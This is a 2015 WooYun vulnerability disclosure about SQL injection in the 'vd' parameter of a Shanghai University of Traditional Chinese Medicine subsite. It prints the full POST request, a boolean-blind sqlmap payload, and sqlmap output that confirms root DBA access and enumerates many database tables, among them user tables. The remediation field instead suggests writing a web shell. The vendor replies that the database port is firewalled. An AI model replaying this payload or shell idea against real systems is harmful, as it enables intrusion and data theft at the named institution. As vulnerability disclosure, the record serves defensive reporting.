当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159203

漏洞标题:上海中医药大学某分站存在sql注入(DBA权限)

相关厂商:shutcm.edu.cn

漏洞作者: 路人甲

提交时间:2015-12-08 09:02

修复时间:2016-01-21 18:22

公开时间:2016-01-21 18:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-08: 厂商已经确认,细节仅向厂商公开
2015-12-18: 细节向核心白帽子及相关领域专家公开
2015-12-28: 细节向普通白帽子公开
2016-01-07: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

rt

详细说明:

POST /portal/index.php?option=com_gsresource HTTP/1.1
Content-Length: 272
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**
Cookie: 8fba71df95b59713a160aa595606409e=3t1a8uvjfognjmt8go3nivcb86; MoodleSession=ar564lijhkha75jkbtbiu1nn32; MoodleSessionTest=xbJ2XFCNIC; MOODLEID_=%25ED%25C3%251CC%25B7d
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
search=%e6%90%9c%e7%b4%a2&key=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&option=com_gsresource&range=title&task=resultshow&vd=*


vd参数存在注入

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: search=%e6%90%9c%e7%b4%a2&key=%e8%af%b7%e8%be%93%e5%85%a5%e5%85%b3%e9%94%ae%e5%ad%97&option=com_gsresource&range=title&task=resultshow&vd=-3315 OR 8251=8251-- ArTZ
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5
current user: 'root@localhost'
current database: 'gsplatform'
current user is DBA: True
available databases [5]:
[*] gsplatform
[*] information_schema
[*] mysql
[*] performance_schema
[*] test


[21:19:25] [INFO] fetching tables for database: 'gsplatform'
[21:19:25] [INFO] fetching number of tables for database 'gsplatform'
[21:19:25] [WARNING] reflective value(s) found and filtering out
[21:19:25] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:19:25] [INFO] retrieved: 309
[21:20:07] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
[21:20:07] [INFO] retrieved: adodb_logsql
[21:20:38] [INFO] retrieved: app_course
[21:21:01] [INFO] retrieved: app_course_assignment
[21:21:37] [INFO] retrieved: app_device
[21:21:55] [INFO] retrieved: app_experiment
[21:22:25] [INFO] retrieved: app_experiment_article
[21:22:51] [INFO] retrieved: app_experiment_class
[21:23:10] [INFO] retrieved: app_experiment_device_map
[21:23:41] [INFO] retrieved: app_experiment_tool
[21:23:58] [INFO] retrieved: app_experiment_type
[21:24:13] [INFO] retrieved: app_experiment_type_int
[21:24:32] [INFO] retrieved: app_info_link
[21:24:55] [INFO] retrieved: gs_cm_dateinfo
[21:25:31] [INFO] retrieved: gs_cm_main
[21:25:45] [INFO] retrieved: gs_cm_roominfo
[21:26:09] [INFO] retrieved: gs_cm_terminfo
[21:26:34] [INFO] retrieved: gs_rm_category
[21:27:03] [INFO] retrieved: gs_rm_converted
[21:27:32] [INFO] retrieved: gs_rm_filetag
[21:27:53] [INFO] retrieved: gs_rm_log
[21:28:05] [INFO] retrieved: gs_rm_mai
[21:28:47] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
n
[21:28:50] [INFO] retrieved: gs_rm_tags
[21:29:03] [INFO] retrieved: gs_rm_vote
[21:29:17] [INFO] retrieved: gs_rm_votelog
[21:29:30] [INFO] retrieved: jos_attachments
[21:30:08] [INFO] retrieved: jos_banner
[21:30:26] [INFO] retrieved: jos_bannerclient
[21:30:47] [INFO] retrieved: jos_bannertra
[21:31:30] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
ck
[21:31:56] [INFO] retrieved: jos_categories
[21:32:23] [INFO] retrieved: jos_components
[21:32:48] [INFO] retrieved: jos_contact_details
[21:33:22] [INFO] retrieved: jos_content
[21:33:36] [INFO] retrieved: jos_content_frontpage
[21:34:05] [INFO] retrieved: jos_content_rating
[21:34:24] [INFO] retrieved: jos_core_acl_aro
[21:34:52] [INFO] retrieved: jos_core_acl_aro_groups
[21:35:14] [INFO] retrieved: jos_core_acl_aro_map
[21:35:29] [INFO] retrieved: jos_core_acl_aro_sections
[21:35:57] [INFO] retrieved: jos_core_acl_groups_aro_map
[21:36:40] [INFO] retrieved: jos_core_log_items
[21:37:07] [INFO] retrieved: jos_core_log_searches
[21:37:31] [INFO] retrieved: jos_groups
[21:37:48] [INFO] retrieved: jos_hwdvidsantileech
[21:38:28] [INFO] retrieved: jos_hwdvidscategories
[21:39:04] [INFO] retrieved: jos_hwdvidschannels
[21:39:27] [INFO] retrieved: jos_hwdvidsfavorites
[21:39:54] [INFO] retrieved: jos_hwdvidsflagged_groups
[21:40:34] [INFO] retrieved: jos_hwdvidsflagged_videos
[21:41:02] [INFO] retrieved: jos_hwdvidsgroup_membership
[21:41:46] [INFO] retrieved: jos_hwdvidsgroup_videos
[21:42:09] [INFO] retrieved: jos_hwdvidsgroups
[21:42:19] [INFO] retrieved: jos_hwdvidsgs
[21:42:28] [INFO] retrieved: jos_hwdvidslogs_archive
[21:43:02] [INFO] retrieved: jos_hwdvidslogs_favours
[21:43:26] [INFO] retrieved: jos_hwdvidslogs_views
[21:43:44] [INFO] retrieved: jos_hwdvidslogs_votes
[21:44:01] [INFO] retrieved: jos_hwdvidsplaylists
[21:44:27] [INFO] retrieved: jos_hwdvidsrating
[21:44:46] [INFO] retrieved: jos_hwdvidsss
[21:45:00] [INFO] retrieved: jos_hwdvidssubs
[21:45:16] [INFO] retrieved: jos_hwdvidsvideo_category
[21:45:56] [INFO] retrieved: jos_hwdvidsvideos
[21:46:06] [INFO] retrieved: jos_joomdle_bundles
[21:46:47] [INFO] retrieved: jos_joomdle_course_applications
[21:47:38] [INFO] retrieved: jos_joomdle_field_mappings
[21:48:14] [INFO] retrieved: jos_joomdle_mailinglists
[21:48:46] [INFO] retrieved: jos_joomdle_profiletypes
[21:49:18] [INFO] retrieved: jos_joomdle_purchased_courses
[21:50:01] [INFO] retrieved: jos_menu
[21:50:14] [INFO] retrieved: jos_menu_types
[21:50:33] [INFO] retrieved: jos_messages
[21:50:51] [INFO] retrieved: jos_messages_cfg
[21:51:08] [INFO] retrieved: jos_migration_backlinks
[21:51:54] [INFO] retrieved: jos_modules
[21:52:12] [INFO] retrieved: jos_modules_menu
[21:52:32] [INFO] retrieved: jos_newsfeeds
[21:52:59] [INFO] retrieved: jos_plugi
[21:53:45] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
ns
[21:53:52] [INFO] retrieved: jos_poll_data
[21:54:15] [INFO] retrieved: jos_poll_date
[21:54:28] [INFO] retrieved: jos_poll_menu
[21:54:50] [INFO] retrieved: jos_polls
[21:54:58] [INFO] retrieved: jos_sections
[21:55:25] [INFO] retrieved: jos_session
[21:55:42] [INFO] retrieved: jos_stats_agents
[21:56:14] [INFO] retrieved: jos_templates_menu
[21:56:54] [INFO] retrieved: jos_users
[21:57:11] [INFO] retrieved: jos_weblinks
[21:57:34] [INFO] retrieved: mdl_assignment
[21:58:09] [INFO] retrieved: mdl_assignment_submissions
[21:58:46] [INFO] retrieved: mdl_backup_config
[21:59:20] [INFO] retrieved: mdl_backup_courses
[21:59:39] [INFO] retrieved: mdl_backup_files
[21:59:57] [INFO] retrieved: mdl_backup_ids
[22:00:12] [INFO] retrieved: mdl_backup_log
[22:00:33] [INFO] retrieved: mdl_block
[22:00:48] [INFO] retrieved: mdl_block_instance
[22:01:21] [INFO] retrieved: mdl_block_pinned
[22:01:50] [INFO] retrieved: mdl_block_rss_client
[22:02:27] [INFO] retrieved: mdl_block_sear
[22:03:11] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
ch_documents
[22:03:39] [INFO] retrieved: mdl_cache_filters

漏洞证明:

修复方案:

mysql dba权限知道路径在写shell...

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-12-08 10:43

厂商回复:

数据库端口已通过系统防火墙封闭,校园网无法访问到

最新状态:

暂无